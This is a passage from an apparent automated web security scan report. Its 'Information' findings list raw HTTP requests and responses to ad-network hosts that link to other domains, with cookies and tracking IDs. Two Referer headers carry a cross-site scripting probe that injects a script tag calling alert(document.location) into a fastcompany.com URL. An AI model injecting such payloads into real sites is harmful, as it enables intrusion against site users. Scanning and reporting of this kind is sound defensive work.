Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=uid=dd24a7d4-d3d5-11e0-8d9f-78e7d1fad490&_hmacv=1&_salt=2478993672&_keyid=k1&_hmac=b96a3af4c1f9c52f33944d31e2827ff5a044729b; pc1="b!!!!#!!`4y!,Y+@!$[S#!,`ch!#*?W!!!!$!?5%!'jyc4![`s1!!J0T!#Rha~~~~~~=3]i]~~"; pv1="b!!!!,!!`5!!!E)'!$[Rw!,`ch!#*?W!!H<'!#Ds0$To(/![`s1!!28r!#Rha~~~~~~=3f=@=7y'J~!#101!,Y+@!$Xx(!1n,b!#t3o~!!?5%$To(2!w1K*!!NN)!'1C:!$]7n~~~~~=3f9K~~!$?74!(WdF!#?co!4ZV5!'@G9!!H<'!#My1%5XA2!wVd.!$WfY!(?H/!(^vn~~~~~=3rvQ=43oL!!!#G!$5w<!!!?,!$bkN!43C%!'4e2!!!!$!?5%!$To(.!wVd.!%4<v!#3oe!(O'k~~~~~=3f:v=7y%)!!!%Q!#3y2!!!?,!%M23!3Ug(!'=1D!!!!$!?5%!$Tx./#-XCT!%4<v!$k1d!(Yy@~~~~~=3r-B~~!#VS`!!E)$!$`i)!.fA@!'A/#!#:m/!!QB(%5XA2![:Z-!#gyo!(_lN~~~~~~=3rxF~~!#%s?!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!!NB!#%sB!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL!#,Uv!!E)$!$`hJ!4B$-!%we^!#a.5!?5%!%5XA1!]$.4!#QKc!(4kT~~~~~~=3rxS=6$BX!!.vL"; ih="b!!!!:!'R(Y!!!!#=3rxs!,`ch!!!!$=3f=@!.`.U!!!!#=3H3k!.fA@!!!!$=3rxF!/O#b!!!!#=3rvf!1-bB!!!!#=3f:x!1[PX!!!!#=3rv_!1[Pa!!!!#=3rw4!1n,b!!!!(=3f9K!1ye!!!!!#=3rv=!2(Qv!!!!#=3^]V!2rc<!!!!#=3rvk!2reF!!!!'=3f<'!38Yq!!!!#=3f8`!38Yt!!!!#=3f<j!3Eo4!!!!#=3f.'!3Ug(!!!!#=3r-B!43C%!!!!#=3f:v!4A]Y!!!!#=3f8q!4B$-!!!!#=3rxS!4ZV4!!!!#=3f9)!4ZV5!!!!$=3rvQ!4cvD!!!!#=3r-A"; lifb=!6-Nb'W00AO<![f; bh="b!!!#f!!-C,!!!!%=3`c_!!-G2!!!!#=3v7G!!-O3!!!!#=3G@^!!0)q!!!!%=3v6(!!18B!!!!#=3h8[!!1CB!!!!#=3_%L!!1CD!!!!#=4-9i!!2R$!!!!#=3f8d!!346!!!!#=3f8q!!3:c!!!!$=3r-A!!3?X!!!!#=3f8a!!3O?!!!!%=3`c_!!3ba!!!!%=3_*]!!4BO!!!!#=3f8o!!4dM!!!!$=3f8l!!4e4!!!!#=3f8s!!Os7!!!!#=3G@^!!VQ'!!!!#=3f8V!!WMT!!!!$=3f8f!!`4x!!!!%=3]i_!!i9U!!!!'=3O-Q!!iOo!!!!%=3^]5!!jBx!!!!#=2srH!!pf4!!!!%=3`c_!!qu+!!!!#=4-9i!!sXC!!!!#=3f:p!!srh!!!!$=3i!G!!t^6!!!!+=3r-9!!t^G!!!!%=3v6I!!t^K!!!!#=3v6.!!u*$!!!!#=43nV!!xX+!!!!$=4)V$!!y)?!!!!#=3*$x!#%v(!!!!#=3*$x!#+s_!!!!#=3h8[!#+sb!!!!#=3h8[!#.dO!!!!%=3H5P!#0Db!!!!#=3*$x!#0Kr!!!!(=3MuQ!#2Gj!!!!%=3`c_!#2Rm!!!!#=3*$x!#4-m!!!!'=3v6J!#4-n!!!!#=3v6/!#8.'!!!!#=4-9m!#83a!!!!#=3*$x!#83b!!!!#=35g_!#8?7!!!!#=4-9i!#8TD!!!!#=3*$x!#9Dw!!!!+=4-5/!#:@G!!!!%=3f=d!#?LQ!!!!'=3[HX!#Fw`!!!!'=3[HX!#Ic1!!!!#=4-9j!#N[5!!!!#=3!ea!#Q*T!!!!%=3H5P!#Q_h!!!!$=3gb9!#SCj!!!!%=3H5P!#SCk!!!!%=3H5P!#UD`!!!!$=3**U!#WZE!!!!#=3*$x!#YCf!!!!#=35g_!#YQK!!!!#=3@yl!#Z8E!!!!#=3G@^!#`WU!!!!#=3_(1!#aG>!!!!%=3H5P!#bw^!!!!#=3G@^!#dCX!!!!#=3O-J!#e/A!!!!#=4-8P!#eAL!!!!#=4X$v!#eCK!!!!#=4X$v!#eP^!!!!#=3*$x!#fBj!!!!#=3G@^!#fBk!!!!#=3G@^!#fBl!!!!#=3G@^!#fBm!!!!#=3G@^!#fBn!!!!#=3G@^!#fG+!!!!#=3G@^!#fvy!!!!#=3H3j!#gbm!!!!#=4O@H!#gc/!!!!#=4O>^!#k[]!!!!#=3!ea!#k[_!!!!#=35g_!#qMq!!!!#=3GDG!#rJ!!!!!#=3r#L!#tou!!!!#=4-B-!#tp-!!!!#=4-Bu!#uEh!!!!$=3Msq!#uQD!!!!#=3_%L!#uQG!!!!#=3_%L!#ust!!!!%=3H5P!#usu!!!!%=3H5P!#v-#!!!!#=3*$x!#wW9!!!!%=3H5P!#yM#!!!!%=3H5P!$#WA!!!!%=3H5P!$%,!!!!!%=3H5P!$%SB!!!!%=3H5P!$%sF!!!!#=3!ea!$%sH!!!!#=35g_!$%uX!!!!#=35g_!$%vg!!!!#=3!ea!$%vi!!!!#=35g_!$(!P!!!!#=3G@^!$(aZ!!!!#=3M1/!$)gB!!!!#=3*$x!$*9h!!!!#=35g_!$*NG!!!!#=3_%M!$*a0!!!!%=3H5P!$*iP!!!!#=3_(3!$+2e!!!!#=3!ea!$+2h!!!!#=35g_!$+fh!!!!#=3f*7!$+fl!!!!#=3f+$!$,0h!!!!%=3H5P!$,jv!!!!#=3!ea!$-p1!!!!#=3f8c!$.+#!!!!#=4)S`!$.TJ!!!!#=3!ea!$.TK!!!!#=35g_!$.U`!!!!#=4+!r!$.YJ!!!!#=3v7G!$.YW!!!!#=3v7G!$0Ge!!!!(=3MuS!$1:.!!!!#=3!ea!$1NN!!!!#=3[H:!$1N`!!!!$=3[H0!$1P-!!!!$=3[H0!$1PB!!!!#=3[H:!$1QB!!!!#=3[HX!$2::!!!!#=3[HX!$2j$!!!!%=3H5P!$3Dm!!!!#=3*4J!$3IO!!!!#=3G@^!$3y-!!!!'=2v<]!$4ou!!!!%=3H5P!$6$J!!!!#=3i:D!$6$M!!!!#=3i:C!$7w'!!!!#=3*4K!$9_!!!!!#=3!ea!$:3]!!!!#=3!ea!$<DI!!!!#=3G@^!$=X=!!!!#=3H3a!$=p7!!!!%=3H5P!$=p8!!!!%=3H5P!$=s9!!!!%=4F,0!$>#M!!!!%=3H5P!$>#N!!!!%=3H5P!$>ox!!!!$=3_*_!$?1O!!!!%=3rvQ!$?i5!!!!%=3`c_"; BX=ei08qcd75vc4d&b=3&s=8s&t=246

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:48:37 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: BX=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: lifb=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
Set-Cookie: uid=/; path=/; expires=Mon, 01-Mar-2004 00:00:00 GMT
X-RightMedia-Hostname: raptor0201.rm.sp2
Set-Cookie: ih="b!!!!#!3e]N!!!!#=4X%/"; path=/; expires=Wed, 11-Sep-2013 12:48:37 GMT
Set-Cookie: vuday1=Ve/>3!4j#()xxac; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Set-Cookie: uid=uid=88b682c8-dd3d-11e0-8111-78e7d162bf12&_hmacv=1&_salt=2987826240&_keyid=k1&_hmac=d6fc6e23e1a639a39e50969336a0089f0e9aba40; path=/; expires=Wed, 12-Oct-2011 12:48:37 GMT
Set-Cookie: liday1=:Op`R$4^M4!4j#(@7q_<; path=/; expires=Tue, 13-Sep-2011 00:00:00 GMT
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:48:37 GMT
Pragma: no-cache
Content-Length: 712
Content-Type: text/html
Age: 0
Proxy-Connection: close

<html><head><title></title></head><body style="margin-left: 0%; margin-right: 0%; margin-top: 0%; margin-bottom: 0%"><script type="text/javascript">if (window.rm_crex_data) {rm_crex_data.push(10293202
...[SNIP]...
</script><script language='javascript' type='text/javascript' src='http://imp.fetchback.com/serve/fb/adtag.js?tid=68318&type=halfpage&clicktrack=http%3A%2F%2Fadserving%2Ecpxinteractive%2Ecom%2Fclk%3F3%2CeAGdS9sOgjAU%2DyGU7cAGuPgwIBKUxdsQ9Q3BWxA1EZ3x6w0qfIB96GlPW2ywlNI0NZFhE4MiywKGDSB5unV2lqUhxhgGAMekDiJaeYtd7gINuD%2E3CeIfiEcy3H8lb25tJ3bNnjd62dHvf963hQDLsM7%2EBYxmzTT0uPrqnHTuSxm6TcL9vBgnMRZBiKJkVgiYVkIOTsJDRASLMpKZuZZ5IeTquS5jGLdD3te0Q1Vde7qulOqeL%2Dp635yOWTe7lPobpv5WYg%3D%3D%2C'></script>
...[SNIP]...
11.21. http://ads.bluelithium.com/st  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.bluelithium.com
Path:   /st

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /st?ad_type=iframe&ad_size=1x1&section=2377409 HTTP/1.1
Host: ads.bluelithium.com
Proxy-Connection: keep-alive
Referer: http://d3.zedo.com/jsc/d3/ff2.html?n=933;c=56;s=1;d=15;w=1;h=1;q=1545
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 12 Sep 2011 12:49:32 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Mon, 12 Sep 2011 12:49:32 GMT
Pragma: no-cache
Content-Length: 4577
Age: 0
Proxy-Connection: close

<html><head></head><body><script type="text/javascript">/* All portions of this software are copyright (c) 2003-2006 Right Media*/var rm_ban_flash=0;var rm_url="";var rm_pop_frequency=0;var rm_pop_id=
...[SNIP]...
</noscript><img src="http://content.yieldmanager.com/ak/q.gif" style="display:none" width="1" height="1" border="0" alt="" /></body>
...[SNIP]...
11.22. http://ads.dotomi.com/ads_smokey_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dotomi.com
Path:   /ads_smokey_pure.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads_smokey_pure.php?ms=11 HTTP/1.1
Host: ads.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=11&btg=1&mp=1&dres=iframe&rwidth=300&rheight=250&pp=0&cg=42&tz=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.17
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Vary: Accept-Encoding
Content-Length: 291
Content-Type: text/html; charset=UTF-8
Date: Mon, 12 Sep 2011 12:49:18 GMT
Connection: close

<html>
<head></head>
<body bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><a href="http://www.smokeybear.com/" target="_blank"><IMG alt="www.smokeybear.com" border="0" src="http://ads.dotomi.com/banners/smokey/300.gif">
...[SNIP]...
11.23. http://ads.dotomi.com/ads_smokey_pure.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.dotomi.com
Path:   /ads_smokey_pure.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ads_smokey_pure.php?ms=18 HTTP/1.1
Host: ads.dotomi.com
Proxy-Connection: keep-alive
Referer: http://ads.dotomi.com/ads.php?pid=18300&mtg=0&ms=18&btg=1&mp=1&dres=iframe&rwidth=728&rheight=90&pp=0&cg=42&tz=300
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: DotomiUser=230900890276886667$0$2054424934; DotomiNet=2$Dy0uMjgjDTEtBmddBw97SVUbPXYFdQNHClxiUVFOYnpua1xARWZBXAICW0dLSEFdZWBdf21hUn5RIgFAaVg%3D; DotomiStatus=5

Response

HTTP/1.1 200 OK
Server: Apache
X-Powered-By: PHP/5.2.17
p3p: policyref="/w3c/p3p.xml", CP="NOI DSP NID OUR STP"
Vary: Accept-Encoding
Content-Length: 306
Content-Type: text/html; charset=UTF-8
Date: Mon, 12 Sep 2011 12:48:34 GMT
Connection: close

<html>
<head></head>
<body bottommargin="0" rightmargin="0" leftmargin="0" topmargin="0" marginwidth="0" marginheight="0"><a href="http://www.smokeybear.com/take-pledge.asp" target="_blank"><IMG alt="www.smokeybear.com" border="0" src="http://ads.dotomi.com/banners/smokey/728.gif">
...[SNIP]...
11.24. http://ads.pointroll.com/PortalServe/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /PortalServe/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /PortalServe/?pid=1223610O14520110228172227&flash=0&time=1|13:6|-5&redir=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/u%3B236265776%3B0-0%3B0%3B42089989%3B14458-1000/30%3B41027854/41045641/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f$CTURL$&r=0.3698857081523369 HTTP/1.1
Host: ads.pointroll.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.fastcompany.com/?a9939%22%3E%3Cscript%3Ealert(document.location)%3C/script%3E44507fb50f4=1
Cookie: PRID=576EE847-6FB4-4350-A51B-F241B80B508B; PRbu=EqckgBNpZ; PRvt=CCJ5BEqckgBNpZ!AnBAeJwfEq-wXcayO!GkBAe; PRgo=BBBAAsJvA; PRimp=FCAB0400-7117-8EAC-1309-C1F001A40100; PRca=|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#; PRcp=|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#; PRpl=|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#; PRcr=|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#; PRpc=|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#

Response

HTTP/1.1 200 OK
Connection: close
Date: Mon, 12 Sep 2011 13:06:11 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Cache-Control: no-cache
Content-type: text/html
Content-length: 3171
Set-Cookie:PRvt=CCJwfEq-wXcayO!GkBAeJcgErL4w6agU!A_BBe;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRgo=BBBAAsJvBBVBF4FR;domain=.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;;
Set-Cookie:PRimp=BEAC0400-E930-14A8-1309-7200003E0101; domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRca=|AKEA*263:2|AKYd*396:1|AKRf*130:6|AKbC*423:1|AK7P*4797:4|AK71*28:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcp=|AKEAAAEP:2|AKYdAAGY:1|AKRfAACG:6|AKbCAAGp:1|AK7PABPX:4|AK71AAA2:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpl=|FITe:2|F8Db:1|Fixm:6|FjBA:1|FhSW:2|FiCe:2|FhFr:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRcr=|GUiU:2|GMzt:1|GWDN:6|GTe3:1|GTIC:1|GTID:1|GT7W:2|GSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;
Set-Cookie:PRpc=|FITeGUiU:2|F8DbGMzt:1|FixmGWDN:6|FjBAGTe3:1|FhSWGTIC:1|FhSWGTID:1|FiCeGT7W:2|FhFrGSqZ:1|#;domain=ads.pointroll.com; path=/; expires=Wed, 01-Jan-2020 00:00:00 GMT;

var prwin=window;if(!prwin.prRefs){prwin.prRefs={};};prwin.prSet=function(n,v){if((typeof(n)!='undefined')&&(typeof(v)!='undefined')){prwin.prRefs[n]=v;}};prwin.prGet=function(n){if(typeof(prwin.prRef
...[SNIP]...
</style><a target='_blank' href='http://ad.doubleclick.net/click;h=v8/3b80/3/0/*/u;236265776;0-0;0;42089989;14458-1000/30;41027854/41045641/1;;~aopt=2/0/c8/0;~sscs=?http://clk.pointroll.com/bc/?a=1509596&c=1&i=BEAC0400-E930-14A8-1309-7200003E0101&clickurl=http://ad.doubleclick.net/click%3Bh=v2%7C3D92%7C0%7C0%7C%252a%7Cs%3B237068583%3B0-0%3B0%3B60629732%3B31-1%7C1%3B40663339%7C40681126%7C1%3B%3B%3Bpc=[TPAS_ID]%253fhttp://www.lincoln.com/crossovers/mkx/experiencemkx/%3Fbannerid=1055855%7C60629732%7C237068583%7C0%26referrer=N3016.FastCompany'><img border=0 width='1000' height='30' style='width:1000px;height:30px' src='http://speed.pointroll.com/PointRoll/Media/Banners/Ford/876608/Lincoln-MKX-Fast-Company-Pushdown_1000x30_Dflt.jpg?PRAd=15095
...[SNIP]...
11.25. http://adunit.cdn.auditude.com/flash/modules/display/auditudeDisplayLib.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://adunit.cdn.auditude.com
Path:   /flash/modules/display/auditudeDisplayLib.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /flash/modules/display/auditudeDisplayLib.js?callback=ndn.auditudeCallback&width=275&height=200&version=adunit-1.0&domain=auditude.com&zoneId=&mediaId=23408962&parentNode=auditudeContent&keyValues=dpid=;sitesection=;sec=oth;sub=;wgt=1;width=275;height=200;url=http://savannahnow.com/&autoPlay=true&ndnR=14&countdownMessage=Todays%20Top%20Videos%20available%20in%20{countdown} HTTP/1.1
Host: adunit.cdn.auditude.com
Proxy-Connection: keep-alive
Referer: http://widget.newsinc.com/_fw/Savannah/toppicks_savannah_top.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Cache-Control: must-revalidate
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:49:22 GMT
ETag: "2736172791"
Expires: Mon, 12 Sep 2011 12:49:22 GMT
Last-Modified: Fri, 06 May 2011 17:05:19 GMT
Server: ECS (sjo/5238)
X-Cache: HIT
Content-Length: 11744

(function() {

   var PLAYER_SWF_URL = 'http://adunit.cdn.auditude.com/flash/modules/display/AuditudeDisplayView';
   var AUD_SCRIPT_IDENTIFIER = 'auditudeDisplayLib.js';

   // Flash Player Version Detecti
...[SNIP]...
<td align="center"><a href="http://www.adobe.com/go/getflash/" style="color:white">' +
           '<span style="font-size:12px">
...[SNIP]...
11.26. http://btg.mtvnservices.com/aria/coda.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://btg.mtvnservices.com
Path:   /aria/coda.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /aria/coda.html?site=mtv.co.uk HTTP/1.1
Host: btg.mtvnservices.com
Proxy-Connection: keep-alive
Referer: http://www.mtv.co.uk/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Content-Type: text/javascript
ETag: "f299a3dae78bb253e97d79cdd330980c:1315483817"
Vary: Accept-Encoding
Cache-Control: max-age=60
Date: Mon, 12 Sep 2011 12:49:49 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 256625


                                                                                                                                                       //Including Coda 2 build.
               // CODA 2.40 dated 07-Sep-2011 Wed 11:52 AM
/*    SWFObject v2.2 <http://code.google.com/p/swfobject/>
   is r
...[SNIP]...
<p><a href="http://www.adobe.com/go/getflashplayer">Download the free Flash Player now!</a><br/><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /> </a>
...[SNIP]...
11.27. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ca?aid=abs01&pid=mec01&cid=0811abs728x90&w=728&h=90&c=abs01cont19&js=2 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:48:04 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 22808
Connection: keep-alive

truste.ca.addClearAdIcon=function(D){if(!truste.ca[D.baseName+"_bi"]){truste.ca[D.baseName+"_bi"]=D}truste.ca.adTypeMap[D.baseName]=1;
var c=truste.ca.findCreative(D);if(!c){var q=null;if(truste.ca.IE
...[SNIP]...
</span>';
var a="http://choices.truste.com/assets/admarker.swf";var j="77";if(m.cam=="3"||m.cam=="4"){a="http://choices.truste.com/get?name=adicon.swf";
j="20"}var g='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="'+j+'" height="16" style="position: relative"><param name="flashVars" value="bindingId='+m.baseName+'"/>
...[SNIP]...
<img width="77px" height="15px" src="'+m.icon_cam_mo+'" style="border:none;position:absolute;right:0px;top:0;">';
if(h){k='<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://active.macromedia.com/flash4/cabs/swflash.cab#version=4,0,0,0" id="tecafi" width="77" height="16" style="position: relative"><param name="flashVars" value="bindingId='+m.baseName+'"/>
...[SNIP]...
11.28. http://choices.truste.com/ca  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://choices.truste.com
Path:   /ca

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /ca?pid=mec01&aid=abs01&cid=0811abs728x90&c=abs01cont19&w=728&h=90 HTTP/1.1
Host: choices.truste.com
Proxy-Connection: keep-alive
Referer: http://view.atdmt.com/CNT/iview/334302974/direct/01/1829737?click=http://ad.doubleclick.net/click%3Bh%3Dv8/3b80/3/0/%2a/y%3B243066172%3B0-0%3B0%3B42089989%3B3454-728/90%3B42929988/42947775/1%3B%3B%7Eaopt%3D2/0/c8/0%3B%7Esscs%3D%3f
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165058976.1777501294.1314893711.1314893711.1314893711.1; __utmz=165058976.1314893711.1.1.utmcsr=iab.net|utmccn=(referral)|utmcmd=referral|utmcct=/site_map

Response

HTTP/1.1 200 OK
Cache-Control: private, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/javascript
Date: Mon, 12 Sep 2011 12:47:59 GMT
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Server: Apache-Coyote/1.1
Vary: Accept-Encoding
Content-Length: 6592
Connection: keep-alive

if(typeof truste=="undefined"||!truste){var truste={};truste.ca={};truste.ca.contMap={};truste.ca.intMap={};
truste.img=new Image(1,1);truste.ca.resetCount=0;truste.ca.intervalStack=[];truste.ca.bindM
...[SNIP]...
<hr />\n <a href="http://www.att.com/gen/privacy-policy?pid=2506" target="_blank">AT&T Privacy Policy &raquo;</b>
...[SNIP]...
11.29. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?nid=34779547 HTTP/1.1
Host: cm.g.doubleclick.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://p.raasnet.com/partners/universal/in?pid=1965&channel=fc_homepage&ndl=http%3A//www.fastcompany.com/%3Fa9939%2522%253E%253Cscript%253Ealert%28document.location%29%253C/script%253E44507fb50f4%3D1&ndr=http%3A//www.fakereferrerdominator.com/referrerPathName%3FRefParName%3DRefValue&pt=&et=&t=f
Cookie: id=229a9504260100ca||t=1312233693|et=730|cs=002213fd4876a8a011eba88ea7

Response

HTTP/1.1 302 Found
Location: http://p.raasnet.com/partners/pixel?t=gcm&id=CAESEKhDLfTHbxj77UOiLKpphxM&cver=1
Cache-Control: no-store, no-cache
Pragma: no-cache
Date: Mon, 12 Sep 2011 13:06:07 GMT
Content-Type: text/html; charset=UTF-8
Server: Cookie Matcher
Content-Length: 284
X-XSS-Protection: 1; mode=block

<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://p.raasnet.com/partners/pixel?t=gcm&amp;id=CAESEKhDLfTHbxj77UOiLKpphxM&amp;cver=1">here</A>
...[SNIP]...
11.30. http://cm.g.doubleclick.net/pixel  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cm.g.doubleclick.net
Path:   /pixel

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pixel?google_nid=sha&google_cm&stid=i-048AA00A35CF5E4EC53E553302EE710A HTTP/1.1
Host: cm.g.doubleclick.net
Proxy-Connection: keep-alive
